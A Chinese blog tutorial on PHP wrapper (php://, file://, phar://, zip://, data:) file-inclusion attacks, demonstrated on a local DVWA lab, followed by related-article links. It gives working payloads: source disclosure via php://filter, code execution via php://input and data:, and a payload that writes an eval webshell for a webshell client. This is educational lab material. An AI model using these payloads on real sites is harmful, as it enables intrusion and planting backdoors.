php伪协议(文件包含)

已于 2023-08-31 16:44:50 修改
阅读量3.3k 收藏 18
点赞数 6
分类专栏: php 文章标签: 网络安全 web安全 php
于 2021-05-14 09:27:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/116779587
版权

php支持多种封装协议
一.实验环境
dvwa平台low级别,phpstudy中设置为5.4.45版本
*将php.ini中的allow_url_fopen和allow_url_include都改为On
需要四个文件:
1.index.php(默认有,在phpStudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi目录下)
在这里插入图片描述
2.index.php同级目录下创建1.txt文件
在这里插入图片描述
3.创建2.txt文件
在这里插入图片描述
4.创建3.txt并且解压为3.zip
在这里插入图片描述
再说明一下,include()函数对文件后缀名无要求,而对其中的语法有要求,即使后缀名为txt,jpg也会被当做php文件解析,只要文件内是<?php ?>形式就可以执行,但是如果不是php语法的形式,即使后缀为php,也无法执行。
二.演示
1.php://访问输入输出流,有两个常用的子协议
(1)php://filter设计用来过滤筛选文件
用法:非php语法文件include失败,直接输出源码内容
命令:php://filter/resource=1.txt
在这里插入图片描述
用法:php语法文件include成功,直接运行
命令:php://filter/resource=2.txt
在这里插入图片描述
如果想要读取运行php文件的源码,可以先base64编码,再传入include函数,这样就不会被认为是php文件,不会执行,会输出文件的base64编码,再解码即可。
在这里插入图片描述
若采用rot13编码,对php文件中的<?是无效的,仍会被认为是php文件去执行,但其中的内容是乱码的,是没有输出效果的。 (2)php://input 这个协议的利用方法是 将要执行的语法php代码写在post中提交,不用键与值的形式,只写代码即可。 命令:php://input(get中) <?php phpinfo();?>(post中)
在这里插入图片描述
在这里插入图片描述
这里我们用input协议将shell写入网站目录下
首先该目录下没有shell.php
在这里插入图片描述
然后写入
命令:php://input(get中)

<?php fputs(fopen('E:\phpStudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\shell.php','w'),'<?php @eval($_POST[shell]);?>')?>(post中)

在这里插入图片描述
查看目录成功生成
在这里插入图片描述
访问网址,菜刀进行连接
在这里插入图片描述
在这里插入图片描述
成功
2.file:// 与php:filter类似,访问本地文件,但是只能传入绝对路径
命令:file://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/2.txt
在这里插入图片描述
3.Phar://可以查找指定压缩包内的文件
(1)传入绝对路径
命令:
http://127.0.0.1:81/DVWA-master/vulnerabilities/fi/?page=phar://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/3.zip/3.txt
在这里插入图片描述
(2)传入相对路径(同级目录下的文件开始)
命令:http://127.0.0.1:81/DVWA-master/vulnerabilities/fi/?page=phar://3.zip/3.txt
在这里插入图片描述
4.zip://用法与phar类似,不过要注意两点
(1)只能传入绝对路径
(2)要用#分隔压缩包和压缩包内的内容,并且#要用url编码%23
命令:
http://127.0.0.1:81/DVWA-master/vulnerabilities/fi/?page=zip://E:/phpStudy/PHPTutorial/WWW/DVWA-master/vulnerabilities/fi/3.zip%233.txt
在这里插入图片描述
5.data与input类似,都是用户可以控制传入的php代码
data:text/plain,<?php 执行内容 ?>
(1)data:text/plain,<?php%20echo%20%27success%27%20?>
在这里插入图片描述
(2)使用base64编码
data:text/plain;(注意分号不是逗号,与前面不同)base64,编码后的php代码
实验不成功…
附一张别人的成功图:
在这里插入图片描述

6.http协议
include中也可以传入外部链接,采用http://,具体怎么利用以后再来填坑。
命令:?page=http://www.baidu.com
在这里插入图片描述
一张图总结:
在这里插入图片描述

番茄酱料
关注
  • 6
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 15
    评论
专栏目录
WEB入门——文件包含漏洞与PHP伪协议
HasntStartIsOver的博客
06-04 899
在程序员开发过程,通常会把可重复使用的函数写到单个文件,在使用某些函数时,直接调用此文件,无需在此编写,这种调用文件的过程一般被称为文件包含。随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。
文件包含时涉及PHP伪协议总结
最新发布
qq_43256965的博客
05-14 1118
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP伪协议总结温故而知新,宁静以致远。
php文件包含 伪协议
m0_64361111的博客
02-28 1051
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含PHP伪协议学习笔记
2302_80935968的博客
03-22 937
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 793
PHP伪协议
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6536
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
PHP伪协议相关 -.pdf
02-24
以上示例展示了如何利用PHP伪协议来实现不同的功能,包括读取编码后的文本、解压文件、接收用户输入以及读取本地文件等。 #### 五、总结 PHP伪协议为开发者提供了一种简单有效的方式来处理文件和数据,极大地提高...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
PHP 伪协议大总结.docx
02-24
在探讨PHP伪协议之前,我们先来了解下何为“伪协议”。伪协议(pseudo-protocol)指的是由PHP内部实现的特定协议,它们允许开发者通过简单的字符串指定的方式访问各种不同的资源,如文件系统、输入输出流等。这种...
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
### PHP 伪协议详解 #### 一、概览 PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全...
j7ur8#WebBook#伪协议文件包含1
07-25
伪协议参考利用条件filter的过滤器有很多。
PHP伪协议-文件包含
shiyingai
12-24 2003
lfi.php <?php include $_GET['file']; ?> php://input   php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。 注:当enctype="multipart/form-data",php://input 是无效的。
php伪协议c,文件包含之:php伪协议
weixin_34649372的博客
03-27 200
file://协议条件:allow_url_fopen:off/onallow_url_include:off/on作用:用于访问本地文件系统,在CTF通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,...
php伪协议利用文件包含漏洞
../../../../../../../
06-10 453
php支持多种封装协议,这些协议常被CTF出题文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy的设置为5.4.45版本 设置allow_url_fopen和allow_url_include都为On. index.php index.php同级目录下有mytest001.txt mytest002.txt mytest003…txt 再说明一下,include()函数对文件后缀名无要求,而对其的语法有要求,即使后缀名为txt,jpg也会被当做php文件解析
Web学习·PHP伪协议文件包含(部分)
wengbinqiang17的博客
05-04 717
PHP支持的伪协议 file:// 访问本地文件系统 http:// 访问 HTTP(s) 网址 ftp:// 访问 FTP(s) URLs php:// 访问各个输入/输出流(I/O streams) zlib:// 压缩流 data:// 数据(RFC 2397) glob:// 查找匹配的文件路径模式 phar:// PHP 归档 ssh2:// Secure She...
这里我们学习一下文件包含php伪协议
qq_51802152的博客
12-24 162
文件包含的含义
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9205
php支持多种封装协议,这些协议常被CTF出题文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其包含mytest...
PHP 伪协议详解
muxlong的博客
03-21 743
时,我们需要深入了解其背后的机制、应用场景以及使用时的注意事项。
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值